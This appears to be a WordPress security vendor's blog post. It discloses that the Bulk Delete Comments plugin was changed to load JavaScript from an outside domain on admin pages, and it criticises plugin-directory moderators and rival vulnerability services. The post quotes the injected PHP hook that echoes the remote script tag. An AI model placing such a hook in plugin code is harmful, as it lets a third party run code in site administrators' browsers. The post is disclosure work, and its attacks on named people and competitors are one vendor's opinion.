Anyone who has spent much time trying to use WordPress’ support forum and the connected plugin review system knows that the moderators of that often get in the way and causing unnecessary problems (as well other troubling behavior, including deleting unflattering information about a company they promote). At the same time, they don’t take action when there is something they could help with. That is the case involving the 8,000+ install WordPress plugin Bulk Delete Comments. Two weeks ago, a one-star review was left with a concerning claim:

This plugin might be hacked or it is shady on way or another because it have started to slow down wordpress when including a an inclusion of javascript located at: alishahalom.com

function dac_footer_handler()

{

echo ‘<script src=”//alishahalom.com/files/script.js”></script>’;

}

To make sure we provide the best information on WordPress plugin vulnerabilities to our customers, we monitor for posts like that. After seeing that, we looked further into that and confirmed the claims.

A year ago a newly created account submitted a new version of the plugin that registered for the function shown above, dac_footer_handler(), to run when admin pages of the website were loaded:

23

add_action('admin_footer','dac_footer_handler');

That function would load a JavaScript file from what would appear to be the developer’s website.

That violates one of the guidelines of the plugin directory, “Plugins may not send executable code via third-party systems.“, which states:

all non-service related JavaScript and CSS must be included locally

At the time that warning was posted, malicious JavaScript code was being served from that location. The website now serves a parked domain page.

The plugin hasn’t been updated, so that file is still being loaded on websites using the plugin and malicious code be reintroduced. Despite that, the plugin is still available for download from WordPress.

With another recent instance of a guidelines violation being reported in the support forum, it took over a month and half for action to finally be taken.

Lack of Warning from From Matt Mullenweg’s Company

The head of WordPress, Matt Mullenweg, directly employs the person that has largely controlled both the support forum and the plugin directory, Samuel “Otto” Woods. That seems like a rather big conflict of interest, since Matt Mullenweg’s company, Automattic, sells access to information on insecure WordPress plugins, which Samuel Woods has long blocked WordPress from providing for free. Another problem with that situation, is that it doesn’t deliver good results even for those paying his company. Automattic’s WPScan states that you will be the first to know about plugin security issues:

Be the first to know about vulnerabilities affecting your WordPress installation, plugins, and themes.

Despite that claim, they have yet to warn about this situation two weeks out from the public disclosure and a competitor having warned about since the public disclosure:

Two other competitors, Patchstack and Wordfence, have similarly failed to warn about this yet.

Plugin Security Scorecard Grade for Patchstack

See issues causing the plugin to get less than A+ grade

Plugin Security Scorecard Grade for WPScan

See issues causing the plugin to get less than A+ grade